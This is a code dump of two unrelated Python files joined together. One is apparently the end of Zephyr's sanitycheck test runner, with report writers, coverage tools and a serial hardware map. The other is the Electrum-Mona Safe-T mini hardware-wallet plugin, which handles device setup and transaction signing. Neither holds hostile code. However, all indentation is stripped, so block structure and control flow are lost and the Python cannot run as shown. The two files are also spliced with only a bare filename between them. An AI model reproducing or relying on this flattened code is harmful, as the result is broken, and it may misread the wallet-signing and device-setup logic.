def discard_report(self, filename):
try:
if self.discards is None:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True, append=append)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False):
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in self.instances.items():
if platform and instance.platform.name != platform:
continue
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP':
skips += 1
else:
fails += 1
else:
if instance.status in ["failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
else:
passes += 1
run = "Sanitycheck"
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
eleTestsuite = tree.findall('testsuite')[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skip'] = "%d" % skips
else:
eleTestsuites = ET.Element('testsuites')
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (errors + passes + fails + skips),
failures="%d" % fails,
errors="%d" % (errors), skip="%s" % (skips))
for _, instance in self.instances.items():
if platform and instance.platform.name != platform:
continue
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.name
# remove testcases that are being re-run from existing reports
if append:
for tc in eleTestsuite.findall('testcase'):
if tc.get('classname') == "%s:%s" % (instance.platform.name, tname):
eleTestsuite.remove(tc)
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname="%s:%s" % (instance.platform.name, tname),
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK']:
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'SKIP':
el = ET.SubElement(
eleTestcase,
'skipped',
type="skipped",
message=instance.reason)
else:
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname="%s:%s" % (instance.platform.name, instance.testcase.name),
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
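# The handler log is expected to contain a dump of the form (illustrative):
#   GCOV_COVERAGE_DUMP_START
#   *path/to/output.gcda<hex-encoded bytes...
#   GCOV_COVERAGE_DUMP_END
# Each "*" line carries the output file path and its contents, separated by "<".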
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is present, gcovr fails to process the coverage data,
# so skip it; this problem only occurs with gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid genhtml exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
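# e.g. _interleave_list("-e", ["foo", "bar"]) -> ["-e", "foo", "-e", "bar"]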
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
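# The product strings above are matched against the USB product name, first
# verbatim and then as regular expressions (see scan_hw below).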
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform):
device = {
"serial": serial,
"platform": platform,
"counter": 0,
"available": True,
"connected": True
}
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=yaml.FullLoader)
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product']:
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
safe_t.py
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_mona.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_mona.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_mona.bip32 import BIP32Node
from electrum_mona import constants
from electrum_mona.i18n import _
from electrum_mona.plugin import Device
from electrum_mona.transaction import deserialize, Transaction
from electrum_mona.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_mona.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
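# TIM_NEW: let the device generate a new seed; TIM_RECOVER: recover from a
# previously written-down seed; TIM_MNEMONIC: upload a BIP39 mnemonic;
# TIM_PRIVKEY: upload a master private key (see the choices in
# initialize_device below).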
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
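# "sequence" is a (change, index) pair, so this builds e.g. <derivation>/0/3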
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Monacoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
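            # Default nSequence 0xfffffffe keeps nLockTime enforceable without
            # signalling BIP125 replace-by-fee.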
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx: Transaction):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
                # prioritise hiding outputs on the 'change' branch from the user
                # because no more than one change address is allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if info.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
            # probably a segwit input, in which case we don't need the previous tx
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
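    # Signing flow summary (illustrative sketch; the wallet, keystore and tx
    # objects are provided by Electrum, not defined in this module):
    #   sign_transaction(keystore, tx, prev_tx, xpub_path)
    #     -> tx_inputs()/tx_outputs() build the TxInputType/TxOutputType messages
    #     -> client.sign_tx() returns the raw signatures
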